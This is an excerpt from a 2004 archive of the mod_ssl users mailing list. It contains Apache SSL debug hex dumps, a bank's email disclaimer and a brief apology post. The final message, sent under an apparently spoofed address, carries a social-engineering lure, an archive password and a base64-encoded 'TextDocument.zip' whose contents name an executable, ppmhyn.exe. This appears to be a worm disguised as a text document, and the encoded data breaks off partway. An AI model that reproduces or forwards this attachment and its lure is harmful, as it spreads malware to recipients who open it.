[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0240: 04 14 60 59 09 51 ff 43-ef a7 8e d0 df 0b 58 e5  ..`Y.Q.C......X. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0250: c5 06 c1 0d 7b 55 30 81-8d 06 03 55 1d 23 04 81  ....{U0....U.#.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0260: 85 30 81 82 80 14 d7 d6-10 11 17 ad 89 59 4f ec  .0...........YO. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0270: 01 a5 b0 3d 49 9b e8 f0-cc c1 a1 67 a4 65 30 63  ...=I......g.e0c |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0280: 31 0b 30 09 06 03 55 04-06 13 02 54 52 31 0d 30  1.0...U....TR1.0 |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0290: 0b 06 03 55 04 0a 13 04-54 63 6d 62 31 0d 30 0b  ...U....Tcmb1.0. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 02a0: 06 03 55 04 0b 13 04 53-61 70 6d 31 10 30 0e 06  ..U....Sapm1.0.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 02b0: 03 55 04 03 13 07 42 49-47 4d 20 43 41 31 24 30  .U....BIGM CA1$0 |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 02c0: 22 06 09 2a 86 48 86 f7-0d 01 09 01 16 15 77 65  "..*.H........we |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 02d0: 62 6d 61 73 74 65 72 40-74 63 6d 62 2e 67 6f 76  bmaster@tcmb.gov |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 02e0: 2e 74 72 82 01 00 30 22-06 03 55 1d 11 04 1b 30  .tr...0"..U....0 |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 02f0: 19 81 17 6d 61 68 6d 75-74 2e 65 72 65 6e 40 74  ...mahmut.eren@t |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0300: 63 6d 62 2e 67 6f 76 2e-74 72 30 20 06 03 55 1d  cmb.gov.tr0 ..U. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0310: 12 04 19 30 17 81 15 77-65 62 6d 61 73 74 65 72  ...0...webmaster |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0320: 40 74 63 6d 62 2e 67 6f-76 2e 74 72 30 3d 06 09  @tcmb.gov.tr0=.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0330: 60 86 48 01 86 f8 42 01-04 04 30 16 2e 68 74 74  `.H...B...0..htt |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0340: 70 73 3a 2f 2f 73 61 70-73 6c 6e 74 32 2e 74 63  ps://sapslnt2.tc |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0350: 6d 62 2e 67 6f 76 2e 74-72 2f 70 75 62 2f 63 72  mb.gov.tr/pub/cr |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0360: 6c 2f 63 61 63 72 6c 2e-63 72 6c 30 3d 06 09 60  l/cacrl.crl0=..` |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0370: 86 48 01 86 f8 42 01 03-04 30 16 2e 68 74 74 70  .H...B...0..http |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0380: 73 3a 2f 2f 73 61 70 73-6c 6e 74 32 2e 74 63 6d  s://sapslnt2.tcm |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0390: 62 2e 67 6f 76 2e 74 72-2f 70 75 62 2f 63 72 6c  b.gov.tr/pub/crl |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 03a0: 2f 63 61 63 72 6c 2e 63-72 6c 30 3f 06 03 55 1d  /cacrl.crl0?..U. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 03b0: 1f 04 38 30 36 30 34 a0-32 a0 30 86 2e 68 74 74  ..80604.2.0..htt |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 03c0: 70 73 3a 2f 2f 73 61 70-73 6c 6e 74 32 2e 74 63  ps://sapslnt2.tc |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 03d0: 6d 62 2e 67 6f 76 2e 74-72 2f 70 75 62 2f 63 72  mb.gov.tr/pub/cr |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 03e0: 6c 2f 63 61 63 72 6c 2e-63 72 6c 30 0d 06 09 2a  l/cacrl.crl0...* |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 03f0: 86 48 86 f7 0d 01 01 05-05 00 03 82 01 01 00 3c  .H.............< |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0400: f8 d6 ef d1 bc 38 ab 94-da cf 5a d8 56 1e 31 33  .....8....Z.V.13 |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0410: 77 09 ca c4 ad 41 1a 09-7d 62 84 85 e5 5a 65 3c  w....A..}b...Ze< |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0420: ec d4 62 9b 7c de e3 d9-72 b6 da e7 b7 35 1b f8  ..b.|...r....5.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0430: f8 aa 64 96 f1 2d 15 18-64 64 1f b2 f0 24 2a 93  ..d..-..dd...$*. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0440: 8b c2 dc cf 96 e9 78 f9-ab 7d 9e a8 e4 e7 82 0a  ......x..}...... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0450: 35 11 7c ed c6 0a 96 02-c4 5c 42 71 5a 54 eb 82  5.|......\BqZT.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0460: c2 81 40 9f 7f b6 ab a0-ad 74 c6 ff 14 47 f7 81  ..@......t...G.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0470: 8c cc 55 48 ce 68 be 8f-94 27 7c c4 62 33 87 00  ..UH.h...'|.b3.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0480: 1c 6d 74 8d ab f8 af 33-28 6e cb 0e dc 0d 5e ee  .mt....3(n....^. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0490: 8e 5d bd 0d 2a 3d 6a 35-3e f3 a0 c2 00 c0 cd 44  .]..*=j5>......D |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 04a0: 54 d9 06 4a 05 6c 06 ec-2b cc 4e d3 1d b6 9f a7  T..J.l..+.N..... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 04b0: e3 a2 60 35 2d 6c ce 95-92 bc 25 bc e9 ee 99 ba  ..`5-l....%..... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 04c0: 0f 6a b5 ad 64 9a 09 52-5f 23 8e 1e 2c 31 62 92  .j..d..R_#..,1b. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 04d0: 90 99 f9 20 db 41 92 d7-b7 11 cd eb 56 ab b9 11  ... .A......V... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 04e0: c1 e5 09 ef 64 08 df df-47 a0 05 03 07 7e e6 e8  ....d...G....~.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 04f0: 0e fc 41 19 61 d4 0a 57-1d 84 dd a8 79 f1 54 10  ..A.a..W....y.T. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0500: 00 00 80 21 64 f3 63 60-cf c2 ed 75 81 32 28 ad  ...!d.c`...u.2(. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0510: 27 d5 2a 1f 22 f6 7f a0-85 cf af 37 78 aa 33 8d  '.*."......7x.3. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0520: 96 71 1c 44 09 85 ac 0a-12 89 46 6d 7f ac 75 a6  .q.D......Fm..u. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0530: 8f bf 3e cb 9f 51 d1 bc-89 55 3e 2c d9 2d b6 e2  ..>..Q...U>,.-.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0540: 53 e6 62 22 cf 5f 94 0d-ab 2c 05 78 8a 2d 37 de  S.b"._...,.x.-7. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0550: da c3 4c 36 9d 93 ea 40-a7 88 7c f6 26 13 78 d3  ..L6...@..|.&.x. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0560: a8 6d 99 54 44 74 de 46-30 af a2 f5 06 62 e8 ee  .m.TDt.F0....b.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0570: a4 18 38 1d 94 b3 ba b0-5c 2f 2a 61 75 7f b1 81  ..8.....\/*au... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0580: da 65 2f 0f 00 00 82 00-80 6c 81 38 0a b3 7d e8  .e/......l.8..}. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0590: 99 70 fb 47 db 27 de ea-f2 5d d4 c2 d8 16 dd c5  .p.G.'...]...... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 05a0: 48 95 1a d7 16 ad 9c 91-1d dc 1a 6d 9b 98 e9     H..........m...  |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1462): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1484): OpenSSL: read 90/90 bytes from BIO#82caf80 [mem: 82d2bc4] (BIO dump follows)
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1431): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0000: 00 32 7b e7 79 91 cb d7-45 f0 54 a7 d9 8b 9d 4a  .2{.y...E.T....J |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0010: 29 c6 eb 7b 8c 4f 6d 63-87 06 f3 43 e1 d3 79 ee  )..{.Omc...C..y. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0020: 98 39 bb 71 ef 17 be 4a-93 3a 93 1d b0 4a 2b f0  .9.q...J.:...J+. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0030: e5 4f 93 d4 e8 8d 9b f0-c1 e6 61 90 b1 0e 3b cf  .O........a...;. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0040: 39 67 3c 53 1e b6 0c 91-15 06 bf d0 29 06 38 26  9g......D |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 04a0: 54 d9 06 4a 05 6c 06 ec-2b cc 4e d3 1d b6 9f a7  T..J.l..+.N..... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 04b0: e3 a2 60 35 2d 6c ce 95-92 bc 25 bc e9 ee 99 ba  ..`5-l....%..... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 04c0: 0f 6a b5 ad 64 9a 09 52-5f 23 8e 1e 2c 31 62 92  .j..d..R_#..,1b. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 04d0: 90 99 f9 20 db 41 92 d7-b7 11 cd eb 56 ab b9 11  ... .A......V... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 04e0: c1 e5 09 ef 64 08 df df-47 a0 05 03 07 7e e6 e8  ....d...G....~.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 04f0: 0e fc 41 19 61 d4 0a 57-1d 84 dd a8 79 f1 54 10  ..A.a..W....y.T. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0500: 00 00 80 49 5c 9a ec ae-3a fa 71 0f 87 6d fb 01  ...I\...:.q..m.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0510: 8f a8 e2 76 2c 5d 54 77-e9 48 90 51 82 19 08 86  ...v,]Tw.H.Q.... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0520: 72 db a0 7c 2c 1c 6d f1-b8 03 e3 1f 27 6d e1 06  r..|,.m.....'m.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0530: 64 2d 60 03 08 9a 5f 9e-e9 5d da f2 f3 5b e3 0f  d-`..._..]...[.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0540: 3d f1 39 ce da 4b 5b 6a-ef bc ae c2 0b 21 54 3c  =.9..K[j.....!T< |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0550: f3 44 a8 94 bb b8 32 a8-a7 49 d0 95 2a 3e fe 12  .D....2..I..*>.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0560: a5 95 67 33 12 63 58 21-93 b8 e4 ba c0 bb ee 67  ..g3.cX!.......g |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0570: 43 88 fd 86 21 e6 3f 49-03 6f e4 e7 d4 60 f3 ab  C...!.?I.o...`.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0580: 34 54 8d 0f 00 00 82 00-80 10 88 35 cf 21 45 57  4T.........5.!EW |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0590: 5e 52 90 d2 78 0e f5 d3-a1 5d ce 07 f9 8f 61 d1  ^R..x....]....a. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 05a0: 61 79 8c c5 c9 c9 d6 98-26 b6 8e c3 97 66 7e     ay......&....f~  |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1462): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1484): OpenSSL: read 90/90 bytes from BIO#82e1738 [mem: 82d2ae4] (BIO dump follows)
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1431): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0000: 2f 0a 4d 27 70 47 75 ec-38 49 23 30 d0 22 f3 71  /.M'pGu.8I#0.".q |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0010: 88 3c ab 61 21 3d 94 95-08 1f 0d 12 6a 09 15 2a  .<.a!=......j..* |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0020: 3a 46 f6 e4 6b 12 e0 5b-e3 a2 1c 11 78 aa 38 f9  :F..k..[....x.8. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0030: 05 7f e6 cb 4d 8f 42 73-77 5b a7 f3 17 dd 15 cb  ....M.Bsw[...... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0040: ba ef cd 90 3a 0e 9c 65-c8 93 61 5c a1 f4 d8 c3  ....:..e..a\.... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0050: 65 99 20 6f 03 6d 5d 5a-b0 cc                    e. o.m]Z..       |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1462): +-------------------------------------------------------------------------+



==========================================================-
Bu e-posta sadece yukarida isimleri belirtilen kisiler arasinda özel haberlesme amacini tasimaktadir. Size yanlislikla ulasmissa lütfen gönderen kisiyi bilgilendiriniz ve mesaji sisteminizden siliniz. Turkiye Cumhuriyet Merkez Bankasi A.S. bu mesajin icerigi ile ilgili olarak hicbir hukuksal sorumlulugu kabul etmez. 

This e-mail communication is intended for the private use of the people named above. If you received this message in error, please immediately notify the sender and delete it from your system. The Central Bank of The Republic of Turkey does not accept legal responsibility for the contents of this message.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar  5 08:37:23 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 32CBBA8A51; Fri,  5 Mar 2004 08:37:23 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.tcmb.gov.tr (mail.tcmb.gov.tr [213.139.239.100])
	by master.modssl.org (Postfix) with ESMTP id 36814A8940
	for ; Fri,  5 Mar 2004 08:36:02 +0100 (CET)
Received: (qmail 30242 invoked by uid 0); 5 Mar 2004 07:35:58 -0000
Received: from Mahmut.Eren@tcmb.gov.tr by idmsmail2.tcmb.gov.tr with virus-scanner(Clean); 05 Mar 2004 07:35:58 -0000
Received: from idmsmail1.tcmb.gov.tr ([10.5.0.212]) (envelope-sender )
          by idmsmail2.tcmb.gov.tr (qmail-ldap-1.03) with SMTP
          for ; 5 Mar 2004 07:35:50 -0000
Received: by idmsmail1.tcmb.gov.tr with Internet Mail Service (5.5.2653.19)
	id ; Fri, 5 Mar 2004 09:35:50 +0200
Message-ID: <00BAC1E9C896D411A46100508B137C3C0C770870@idmsmail1.tcmb.gov.tr>
From: Mahmut Eren 
To: modssl-users@modssl.org
Subject: problem with SSLVerifyClient required in apache 2.0
Date: Fri, 5 Mar 2004 09:35:47 +0200 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="ISO-8859-9"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mahmut Eren 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

sorry,  I've sent  the same mail again accidentaly....

==========================================================-
Bu e-posta sadece yukarida isimleri belirtilen kisiler arasinda özel haberlesme amacini tasimaktadir. Size yanlislikla ulasmissa lütfen gönderen kisiyi bilgilendiriniz ve mesaji sisteminizden siliniz. Turkiye Cumhuriyet Merkez Bankasi A.S. bu mesajin icerigi ile ilgili olarak hicbir hukuksal sorumlulugu kabul etmez. 

This e-mail communication is intended for the private use of the people named above. If you received this message in error, please immediately notify the sender and delete it from your system. The Central Bank of The Republic of Turkey does not accept legal responsibility for the contents of this message.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar  5 09:06:04 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 07F47A8A5F; Fri,  5 Mar 2004 09:06:04 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from studenten-pc-6 (studenten-pc-6-classroom.geo.uni-bremen.de [134.102.241.66])
	by master.modssl.org (Postfix) with SMTP id 8F310A8A57
	for ; Fri,  5 Mar 2004 09:06:02 +0100 (CET)
Date: Fri, 05 Mar 2004 09:06:02 +0100
To: modssl-users@modssl.org
Subject: Weeeeee! ;)))
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------oxbvqfvqtplejnuvpisr"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------oxbvqfvqtplejnuvpisr
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Looking forward for a response :P

password for archive: 75483

----------oxbvqfvqtplejnuvpisr
Content-Type: application/octet-stream; name="TextDocument.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="TextDocument.zip"

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
